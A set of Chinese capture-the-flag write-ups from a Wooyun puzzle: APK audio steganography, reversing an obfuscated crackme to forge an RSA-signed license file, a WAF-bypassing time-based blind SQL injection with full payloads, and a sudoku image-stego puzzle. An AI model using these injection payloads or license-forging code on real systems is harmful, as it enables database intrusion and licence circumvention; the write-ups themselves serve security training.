1、这个 Android 应用程序中隐藏了怎样的信息?(提示:不要放过任何一点蛛丝马迹)
Tip:flag为32位字符串
首先give me five,然后发现apk解包之后那个牛逼的音乐名字叫five five five。
然后看了一下音乐里面有啥东西,发现有6条音轨,其中2条为正常音频的音轨,其余四条如下:
其中后三条音轨明显跟第一条音轨是降噪关系。所以音乐中并没听出来。
然后上位换为1,下位换为0,输出为文本:
01110011111110111111101001010000111010101110010111111011000111001000110111111111111110011010100111101011011110001100000110011110
查看一共有128位,可转换为16进制,得到32位字符串:
所以结果就是:73 FB FA 50 EA E5 FB 1C 8D FF F9 A9 EB 78 C1 9E
2、请对该程序通过逆向工程,计算出一组可用的 key 和授权文件 wooyun.lic。最后请提交 flag 与 wooyun.lic。
(1) 程序只能运行在 Windows 7 / 8 / 8.1 x64 系统上。
(2) 程序由两部分组成。需要先逆向分析第一部分,才能得到第二个程序。
更新说明:
之前使用的大数库有一个整数溢出的 bug,新版本中已经修复了。该 bug 不影响解题,也不影响之前计算出的 key 的有效性。感谢 Riatre 同学指出该问题!仅更新了 enc.bin
2015-06-16 19:00
这是描述中提到的需要逆向分析以得到第二部分的“第一部分”。首先观察下载得到的压缩包CrptoMat-1.7z
,里面包含两个文件,CrptoMat.exe
及enc.bin
。 其中CrptoMat.exe
是一个32位Windows Console应用程序,而enc.bin
根据文件名猜测,应为加密后的“第二个程序”。
这样,描述中的“程序只能运行在 Windows 7 / 8 / 8.1 x64 系统上。”成为了一个疑点:为什么要求x64呢?
程序在我这里运行时会直接Crash,故决定先在IDA中载入CrptoMat.exe
观察一下。 IDA识别出了main函数,其中最后一个printf
的参数不是有意义的字符串,且前后有以'\x10'为单字节key对其xor解密。 针对这种类型的操作,我们可以写一段简单的 IDAPython 脚本,在idb中将其解密,以方便分析。
def xor(addr, len, skip, key):
for i in range(addr, addr+len, skip):
PatchByte(i, Byte(i) ^ key)
接下来执行 xor(0x423480, 32, 1, 0x10)
即可解密该字符串。不幸的是,进行完这一步后,该字符串仍然不是有意义的字符串。
检查该字符串的xref,可以发现还有另一处地方对其进行了xor解密,追踪调用来源可以发现,这个exe注册了三个TLS Callback,会在程序加载时被执行。三个TLS回调函数中分布着两种混淆。
这些函数中使用了大量形如 74 01 0F
的花指令。对应方式为将0F
的部分直接nop掉即可。(在IDA中,可以使用Edit -> Patch program -> Change byte在idb中进行简单的patch。
除此之外,这些函数开始的位置还有大量的在64位及32位代码段间切换的指令。参考roy g biv的Heaven's Gate: 64-bit code in 32-bit file。形如
push 33h
call $+5
add dword ptr [esp], 5
retf
call $+5
mov dword ptr [esp+4], 23h
add dword ptr [esp], 0Dh
retf
可以注意到,切换后立刻切了回来,并且中间没有夹杂任何x64代码,因此这一段也只是作为简单的反调试 & 花指令,不对实际分析以及Hex-Rays Decompiler的工作产生任何影响。 简单的将其整段替换为nop即可。
去除所有上文描述的干扰,并用Alt+K手动调整一些IDA分析错的call带来的栈影响后,Hex-Rays Decompiler(所谓的F5)已经可以正常工作了。 虽然这三个TLS Callback逻辑比较简单,没有Hex-Rays插件也可以很容易理解。
第一个TLS Callback主要是利用IsDebuggerPresent
进行了简单的反调试。
第二及第三个TLS Callback中使用简单的xor解密了一些常量,填充了另一个常量。将其都按上文的方式还原后,这个程序的逻辑变得清晰了起来。
程序在main中,利用TEB进行了简单的反调试(如果检测到有DebugFlag则会修改之前填充的一个常量)。 然后首先在0x403620处获取了一些系统API的地址。 接下来位于0x403280处的函数打开并读入enc.bin
,调用位于0x402B70处的函数解密,并写入输出文件checkkey.exe
。
下面重点关注解密函数,其首先调用位于0x4012B0的函数进行了初始化,这个函数开头动态填充了一些常量表,将之前在TLS Callback中填充的一个32字节的常量再次逐字节xor了0x73,然后存入栈中。不妨认为这是Key。 后半段则有一些类似于某些对称加密算法中的Key Schedule的过程,但其中使用的所有常量表都是动态填充的,不方便识别具体算法。
先不管他,回到解密函数中,可以发现逻辑非常复杂的循环的次数为 19329 , 注意到 $ 19329 \times 16 $ 恰好等于enc.bin
文件的大小。我们不妨猜测这是一个块大小为16字节的块加密算法。
那么,块大小为16字节,密钥长度为32字节的对称加密算法,首先想到的大概就是 AES-256 了吧。不妨试一试,万一是真的呢 XD
没有IV,先假装它是ECB模式,试试吧。
key = [0x32,62,43,56,24,55,6,18,0x2A,65,43,21,66,21,75,5,21,49,0x32,0x20,0x21,0x1A,59,0x10,0x38,16,0x44,0x18,49,0x31,0x16,36,]
key = ''.join(map(lambda x: chr(x ^ 0x73),key))
from Crypto.Cipher import AES
with open('enc.bin', 'rb') as fp:
enc = fp.read()
aes = AES.new(key=key, mode=AES.MODE_ECB)
with open('dec.bin', 'wb') as fp:
fp.write(aes.decrypt(enc))
看上去解密成功了,然而很快发现,输出的文件看上去并不是原始的checkkey.exe。看上去有一些“多余”的部分。
在懒得分析CrptoMat.exe
中具体的逻辑的情况下,对着该文件脑补,并且观察CrptoMat.exe
中的解密代码,每解密一块16字节,仅输出8字节。 不妨认为只要取每16字节的前8字节即可。
然后发现这样是对的
我们得到了一个checkkey.exe
,简单观察后可以发现,它是一个x64 Windows Console应用程序。 拉进IDA分析,程序明显的分为了两个部分,第一部分验证命令行参数传入的key,第二部分验证wooyun.lic
,并和key似乎有某种关联。
这个程序代码上没有任何故意设置的干扰,Hex-Rays Decompiler可以工作,虽然由于编译优化的原因,得到的部分结果不太容易理解。
检查key的函数对输入的key进行了各种检查,要求满足一些条件(具体条件直接见以下代码),我们使用Z3来求解符合条件的串。
from z3 import *
ZeroExtDword = lambda x: ZeroExt(32, x)
def summie(arr, wordsize):
expr = 0
for i in xrange(wordsize):
expr += sum(map(ZeroExtDword, arr[i::wordsize])) << (i * 8)
return expr
def hashy(x):
ans = 0
for c in map(ZeroExtDword, x):
ans = ((((ans << 3) & 0xFFFFFFFF) | (ans >> 29)) + c) & 0xFFFFFFFF
return ans
def extractDword(key, offset):
return sum([ZeroExtDword(key[offset+i]) << (i * 8) for i in xrange(4)])
_key = [BitVec('k%d' % i, 8) for i in xrange(32)]
recover = lambda m: ''.join(map(chr,[m[c].as_long() for c in _key]))
s = Solver()
for c in _key:
s.add(Or(And(ord('a') <= c, c <= ord('z')),And(ord('0') <= c, c <= ord('9')),And(ord('A') <= c, c <= ord('Z'))))
s.add(summie(_key, 1) == 0xA88)
s.add(summie(_key, 2) == 0x57E0F)
s.add((summie(_key, 4) & 0xFFFFFFFF) == 0x857AF897)
s.add(hashy(_key[::2]) == 0x56BCF7C6)
s.add(sum(map(ZeroExtDword, _key[1::2])) - 16 == 1385)
outer = [0x546658EC, 0x2A4F76A2, 0x281446A3]
for i in xrange(3):
s.add((outer[i] ^ 0x1C270E94) == extractDword(_key, i * 4))
inner = [0xE73153C4, 0x993308F4, 0x8A5779DD]
for i in xrange(3):
s.add((inner[i] ^ 0xCC203528 ^ 0x1C270E94) == extractDword(_key, (i + 1) * 4 + 1))
print s.check()
key = recover(s.model())
print key.encode('hex')
print key
运行即可在0.3s左右的时间内得到一组解,xVAH6xh67H34IaBPZpKqtIdO9vrqbP9P
。
经分析可知,check_license首先计算了文件前4字节以外的部分的"CRC32"校验和,并与前4字节表示的DWORD进行比较。 注意这里的"CRC32"与规范的CRC32不同,有一处移位时故意用算术右移代替了逻辑右移。
接下来,程序计算了除前20字节以外的部分的MD5哈希,并与文件+0x4处开始的16字节进行比较,期望其相等。 然后,程序期望接下来的8字节为00 07 11 F9 F6 AB 13 AE
。
满足以上所有条件后,程序用类似于外层CrptoMat中的方式在内存中xor解密了两个字符串,分别为: "353435899753154886567901508644280318001624308174099373826296801585161412894475724220420610666130867676791214922584602747" 及 "65537"
相信比较敏感同学看到65537之后会立刻将第一个字符串作为一个十进制整数丢进 yafu 或 msieve & ggnfs 中分解。一边让机器跑着一边进行接下来的逆向 #_#
随后,程序对文件+0x28处开始直到文件结尾的内容进行了“某种计算”,期望得到的结果长度大于等于30,并将得到的结果与命令行输入的key比较,期望相符。 此外,还计算了得到的结果的MD5哈希,并与文件+0x18处开始的16个字节比较,期望相符。
我们有充足的理由相信这里的“某种计算”就是RSA。稍作逆向后可以发现没有Padding,直接将字节作为256进制的Big Endian整数解释。 到了这里,把它分解出来,然后根据私钥计算出一个合法的license即可。
该模数N有120位十进制数位,如果没有特意包含比较弱的因子的话,应当是使用 msieve + GGNFS 分解比较迅速,约需要5~6小时。 然而,由于不能排除其故意带有比较弱的因子的可能性,先交给 yafu 去pretest一下吧
结果 yafu 在10秒后给出了分解结果。
detected L1 = 32768 bytes, L2 = 10485760 bytes, CL = 64 bytes
measured cpu frequency ~= 1799.966760
using 20 random witnesses for Rabin-Miller PRP checks
===============================================================
======= Welcome to YAFU (Yet Another Factoring Utility) =======
======= [email protected] =======
======= Type help at any time, or quit to quit =======
===============================================================
cached 78498 primes. pmax = 999983
>> factor(353435899753154886567901508644280318001624308174099373826296801585161412894475724220420610666130867676791214922584602747)
fac: factoring 353435899753154886567901508644280318001624308174099373826296801585161412894475724220420610666130867676791214922584602747
fac: using pretesting plan: normal
fac: no tune info: using qs/gnfs crossover of 95 digits
div: primes less than 10000
rho: x^2 + 3, starting 1000 iterations on C120
rho: x^2 + 2, starting 1000 iterations on C120
rho: x^2 + 1, starting 1000 iterations on C120
pm1: starting B1 = 150K, B2 = gmp-ecm default on C120
ecm: 30/30 curves on C120, B1=2K, B2=gmp-ecm default
ecm: 10/74 curves on C120, B1=11K, B2=gmp-ecm default
ecm: 63/63 curves on C96, B1=11K, B2=gmp-ecm default
ecm: 7/214 curves on C96, B1=50K, B2=gmp-ecm default, ETA: 46 sec
ecm: 14/82 curves on C72, B1=50K, B2=gmp-ecm default, ETA: 12 sec
starting SIQS on c48: 647644121107739553628643132820296925098092891441
==== sieving in progress ( 8 threads): 1232 relations needed ====
==== Press ctrl-c to abort and save state ====
1536 rels found: 765 full + 771 from 5704 partial, (63176.30 rels/sec)
SIQS elapsed time = 0.1472 seconds.
Total factoring time = 9.9477 seconds
***factors found***
P24 = 661333217825639141012939
P25 = 1174612726422110624673683
P24 = 702520810094682184952891
P24 = 714443298299371048348643
P24 = 906501779286561612666587
ans = 1
有趣的是,它一共有5个素因子,所谓的RSA-MP
,不过这并没有影响。
最后,写个简单的脚本生成wooyun.lic
。
import ctypes, hashlib, struct
def fake_crc(data):
tab = [0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f,
0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2,
0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c,
0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423,
0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106,
0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d,
0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7,
0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa,
0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81,
0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84,
0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e,
0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55,
0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28,
0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f,
0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69,
0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc,
0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693,
0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d]
crc = -1
for d in data:
crc = ctypes.c_int(tab[(crc ^ ord(d)) & 0xFF] ^ (crc >> 8)).value
return ~crc
def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
primes = [661333217825639141012939,1174612726422110624673683,702520810094682184952891,714443298299371048348643,906501779286561612666587]
e = 0x10001
def rsamp_fucrypt(data):
N = reduce(lambda x,y:x*y, primes)
phi = reduce(lambda x,y:x*(y-1), primes, 1)
d = modinv(e, phi)
ans = pow(int(data.encode('hex'), 16), d, N)
ans = hex(ans)[2:].rstrip('L')
if len(ans) % 2: ans = '0' + ans
return ans.decode('hex')
def encode_license(key):
data = struct.pack('<II', 0xF9110700, 0xAE13ABF6) + hashlib.md5(key).digest() + rsamp_fucrypt(key)
encoded = hashlib.md5(data).digest() + data
return struct.pack('<i',fake_crc(encoded)) + encoded
with open('wooyun.lic','wb') as fp:
fp.write(encode_license('xVAH6xh67H34IaBPZpKqtIdO9vrqbP9P'))
checkkey.exe中实现的高精度减法处理借位的时候有一个小bug,导致取模在一些边界情况下也是错的。比如$2^{65537} \mod N$就算不对。 不过实际解题时需要的计算并不会遇上这样的边界问题
绕 waf 获取 flag:http://rile.gou.gg/
加'报错:
sql error: u"select * from books where title like '%a'%' limit 3 offset 0"
非显错模式。
加 and ,返回错误信息bad request, hacker.
把关键字统统堆上去,发现过滤了and or xor union limit,未过滤select information_schema等。
注入点在末尾,闭合语句后使用procedure analyse语句进行报错:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1)+%23
果然出现错误页面,证明方法有效。
修改为延时注入:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(ascii(mid('1',1,1))>0,benchmark(5000000,sha(1)),1)))),1)%23
发现确有延时,证明注入位置无误。
构造爆库语句:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(ascii(mid((select+group_concat(DISTINCT+table_schema)+as+g+from+information_schema.tables),1,1))>0,benchmark(5000000,sha(1)),1)))),1)%23
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+group_concat(DISTINCT+table_schema)+as+g+from+information_schema.tables))>0,benchmark(5000000,sha(1)),1)))),1)%23
测试得知,长度为23:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+group_concat(DISTINCT+table_schema)+as+g+from+information_schema.tables))=23,benchmark(5000000,sha(1)),1)))),1)%23
猜测第一个库为information_schema:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(ascii(mid((select+group_concat(DISTINCT+table_schema)+as+g+from+information_schema.tables),1,1))=ascii('i'),benchmark(5000000,sha(1)),1)))),1)%23
返回正确,循环猜测得到结果:
information_schema,test
用同样的方式构造爆表语句:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(((select+group_concat(DISTINCT+table_schema)+as+g+from+information_schema.tables))='information_schema,test',benchmark(5000000,sha(1)),1)))),1)%23
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+group_concat(DISTINCT+table_name)+as+g+from+information_schema.tables+where+table_name='test'))>0,benchmark(5000000,sha(1)),1)))),1)%23
获取长度为10:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+group_concat(DISTINCT+table_name)+as+g+from+information_schema.tables+where+table_schema='test'))=10,benchmark(9000000,sha(11)),1)))),1)%23
由错误回显得知一个已知表为books,猜测其为第一个表:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(ascii(mid((select+group_concat(DISTINCT+table_name)+as+g+from+information_schema.tables+where+table_schema='test'),1,1))=ascii('b'),benchmark(5000000,sha(1)),1)))),1)%23
猜测得知第二个表首字母为f,猜测其全名为flag
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(((select+group_concat(DISTINCT+table_name)+as+g+from+information_schema.tables+where+table_schema='test'))='books,flag',benchmark(5000000,sha(1)),1)))),1)%23
返回正确,得到表名:
books,flag
猜测flag表内只有一个字段,且仅有一条记录,则有:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+*+from+flag))>0,benchmark(9000000,sha(1)),1)))),1)%23
返回正确,猜测成立。
获取长度为26:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if(length((select+*+from+flag))=26,benchmark(9000000,sha(1)),1)))),1)%23
循环猜测每一位:
a%'+procedure+analyse(extractvalue(rand(),concat(0x3a,(if((mid((select+*+from+flag),1,1))='f',benchmark(5000000,sha(1)),1)))),1)%23
最终获取结果:
flag{9g7pgwdjeg8p4opz0gik}
提示:请分析附带的可执行文件,结合图片,恢复相关信息
解出来的数独矩阵:
1,2,6,7,3,9,4,5,8
9,7,5,6,8,4,1,3,2
4,8,3,2,1,5,6,9,7
2,9,4,5,6,3,7,8,1
3,5,8,4,7,1,9,2,6
6,1,7,9,2,8,3,4,5
5,3,1,8,9,7,2,6,4
7,4,2,3,5,6,8,1,9
8,6,9,1,4,2,5,7,3
一、简述及分析
给出了3个程序和一个图片,大概看了看,3个程序逻辑应该是一样的:
程序中包含一串text字符串,和一个数独矩阵,先用text生产一个164Byte的msg:
msg[i]=(text[i]&0xf)/9
msg[i+1]= (text[i]&0xf)%9
msg[i+2]= (text[i]>>4)/9
msg[i+3]= (text[i]>>4)%9
反正大概就是这么个意思。
打开图片input.bmp,分别读出像素的点数据,分别按n%3 分别对RGB三个值做变换(n为像素点编号):
按n%3分别取弟(n/3)%9 个 行、列或矩阵(我这么叫,就是数独种那个小的方块),生成一个九个数字的序列 L。
大概就是n%3==0:
取弟(n/3)%9 行
n%3=1:
取弟(n/3)%9 列
n%3=2:
取弟(n/3)%9 个小方块
再用 L[msg[n%0xa4]]作为一个偏移量对像素值进行偏移,偏移方法为:
9*(r/9) + L[msg[n%0xa4]],如果超过0xff,就-9,使其在0xff有效范围内。
变换后保存图片为soduku.bmp
给出的图名为soduku.bmp,是经过这个程序处理过的(背景像素点色差很明显),拿到程序分析半天没明白是要干嘛,后来发现raspberry2.elf这个文件没有strip,还有些符号信息,包括几个变量(text,msg什么的),经这些启发,猜想是soduku.
bmp这个图片经过同样的算法处理,但是soduku或者text不一样(或者两者都不一样)。
二、开始一顿乱试
先试试用程序里的那个矩阵尝试恢复text,用程序里的矩阵试了试,跑了下有大量冲突,明显不对,然后猜想是图片给出那个数独,把那个数独解出来再试,还是不成。
至于要确认像素变换后的偏移值也很容易,只利用上面那一点白边就够了,(假设原始图片白色部分像素(255,255,255),希望吧,不是我也没办法) ,变换后就在 253-255,247-252这个范围内,是可以还原出来的。
一天没思路去忙别的去了,今天又分析了下,发现msg这个是有一定特征的,因为text这个字符串如果是可打印的话每组msg的第三位一定是0 (text[i]>>4/9),用这个可以确定出矩阵第一行、第一列和没个小矩阵第一个数字,但是一行、一列中的数字相关性很高,虽然有这么多数字依然不能确定,数独的解不唯一,后来想的办法是对text一位一位的爆破(只爆破了hexdigits),使用的条件除了不冲突以外(按照msg第三位为0,和各位text确定的数独矩阵值不会冲突),再加上了数独本身特性的条件(同一行、一列、一个小矩阵不会重复),发现在hexdigits的空间下每位刚好有唯一解,然后分分钟就能解出text,发现这时数独矩阵还没完全填满,就找了个程序把他解出来,然后又用完整的数独解了一遍,结果是一样的。
三、完
还看什么看,真的完了。
最终的flag:1aed56787db88808434ed857e200507c4de68ef3
[原题:Wooyun Puzzle 安全脉搏SP小编整理发布】